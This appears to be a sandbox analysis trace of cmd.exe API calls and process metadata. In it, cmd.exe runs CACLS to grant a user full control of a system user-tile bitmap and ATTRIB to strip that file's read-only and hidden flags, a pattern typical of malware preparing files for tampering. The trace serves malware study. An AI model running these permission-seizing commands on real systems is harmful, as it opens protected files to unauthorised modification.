GetEnvironmentStringsW () returned 0x4b2458* [0187.060] FreeEnvironmentStringsW 
(penv=0x4b2458) returned 1 [0187.060] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.060] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.060] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.060] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.060] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.060] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.060] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af8c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.060] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af8c0, lpFilePart=0x2af8bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af8bc*="Desktop") returned 0x18 [0187.060] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.060] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | out: hFindFile=0x4b0ae8) returned 1 [0187.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | out: hFindFile=0x4b0ae8) returned 1 [0187.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | 
out: hFindFile=0x4b0ae8) returned 1 [0187.061] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.061] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.061] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.061] GetEnvironmentStringsW () returned 0x4b0308* [0187.061] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.062] GetConsoleOutputCP () returned 0x1b5 [0187.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.100] GetUserDefaultLCID () returned 0x409 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afa00, cchData=128 | out: lpLCData="0") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afa00, cchData=128 | out: lpLCData="0") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afa00, cchData=128 | out: lpLCData="1") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.101] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.102] GetConsoleTitleW (in: lpConsoleTitle=0x4a09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.103] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.103] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.103] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.103] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.103] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.103] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.103] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.103] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.106] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.106] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.106] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.106] _wcsicmp 
(_String1="IF", _String2="ATTRIB") returned 8 [0187.106] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.106] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.106] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.108] GetConsoleTitleW (in: lpConsoleTitle=0x2af694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.108] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.108] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.108] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.108] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.108] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.108] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.108] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.108] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.108] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.108] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.108] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.108] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.108] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.109] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.109] _wcsicmp 
(_String1="CACLS", _String2="CALL") returned -9 [0187.109] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.109] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.109] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.109] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.109] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.109] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.109] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.109] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.109] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.109] 
_wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.109] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.109] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.109] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.110] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.110] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.110] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.110] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.110] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.110] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.110] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.110] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.110] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.110] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.110] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.110] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.110] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 
[0187.110] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.110] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.110] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.110] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.110] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.110] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.110] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.110] SetErrorMode (uMode=0x0) returned 0x0 [0187.110] SetErrorMode (uMode=0x1) returned 0x0 [0187.110] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b1e98, lpFilePart=0x2af1b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af1b4*="Desktop") returned 0x18 [0187.110] SetErrorMode (uMode=0x0) returned 0x1 [0187.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.116] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.117] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.117] GetLastError () returned 0x2 [0187.117] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.118] GetLastError () returned 0x2 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4b2180 [0187.118] FindClose (in: hFindFile=0x4b2180 | out: hFindFile=0x4b2180) returned 1 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.118] GetLastError () returned 0x2 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4b2180 [0187.118] FindClose (in: hFindFile=0x4b2180 | out: hFindFile=0x4b2180) returned 1 [0187.118] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.118] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.118] GetConsoleTitleW (in: lpConsoleTitle=0x2af428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.119] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af2b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af378 | out: lpAttributeList=0x2af2b0, lpSize=0x2af378) returned 1 [0187.119] UpdateProcThreadAttribute (in: lpAttributeList=0x2af2b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af370, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af2b0, lpPreviousValue=0x0) returned 1 [0187.119] GetStartupInfoW (in: lpStartupInfo=0x2af26c | out: lpStartupInfo=0x2af26c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.119] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.120] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af30c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af358 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2af358*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe90, dwThreadId=0xd58)) returned 1 [0187.122] CloseHandle (hObject=0x4c) returned 1 [0187.122] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.122] GetEnvironmentStringsW () returned 0x4b0308* [0187.122] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.122] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.315] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af24c | out: lpExitCode=0x2af24c*=0x0) returned 1 [0187.315] CloseHandle (hObject=0x50) returned 1 [0187.316] _vsnwprintf (in: _Buffer=0x2af394, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af258 | out: _Buffer="00000000") returned 8 [0187.316] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.316] GetEnvironmentStringsW () returned 0x4b2410* [0187.316] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.316] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.316] 
GetEnvironmentStringsW () returned 0x4b2410* [0187.316] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.316] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af2b0 | out: lpAttributeList=0x2af2b0) [0187.316] GetConsoleTitleW (in: lpConsoleTitle=0x2af694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.316] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.316] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4ae4d8 [0187.317] FindClose (in: hFindFile=0x4ae4d8 | out: hFindFile=0x4ae4d8) returned 1 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.318] FindFirstFileExW 
(in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4ae4d8 [0187.318] FindClose (in: hFindFile=0x4ae4d8 | out: hFindFile=0x4ae4d8) returned 1 [0187.318] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.318] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.318] GetConsoleTitleW (in: lpConsoleTitle=0x2af428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af2b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af378 | out: lpAttributeList=0x2af2b0, lpSize=0x2af378) returned 1 [0187.318] UpdateProcThreadAttribute (in: lpAttributeList=0x2af2b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af370, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af2b0, lpPreviousValue=0x0) returned 1 [0187.318] GetStartupInfoW (in: lpStartupInfo=0x2af26c | out: lpStartupInfo=0x2af26c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.318] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.318] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af30c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile31.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af358 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessInformation=0x2af358*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8e4, dwThreadId=0xe8c)) returned 1 [0187.320] CloseHandle (hObject=0x50) returned 1 [0187.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.320] GetEnvironmentStringsW () returned 0x4b2410* [0187.320] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.320] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.355] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af24c | out: lpExitCode=0x2af24c*=0x0) returned 1 [0187.355] CloseHandle (hObject=0x4c) returned 1 [0187.355] _vsnwprintf (in: _Buffer=0x2af394, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af258 | out: _Buffer="00000000") returned 8 [0187.355] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.356] GetEnvironmentStringsW () returned 0x4b2410* [0187.356] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.356] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.356] GetEnvironmentStringsW () returned 0x4b2410* [0187.356] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.356] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af2b0 | out: lpAttributeList=0x2af2b0) [0187.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.356] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.356] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.356] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0187.356] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.356] SetConsoleInputExeNameW () returned 0x1 [0187.356] GetConsoleOutputCP () returned 0x1b5 [0187.356] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.356] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.357] exit (_Code=0) Process: id = "392" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "391" os_parent_pid = "0xefc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27005 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27006 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27007 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27008 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27009 start_va = 0x650000 end_va = 0x658fff entry_point = 0x650000 region_type = mapped_file name = "cacls.exe" 
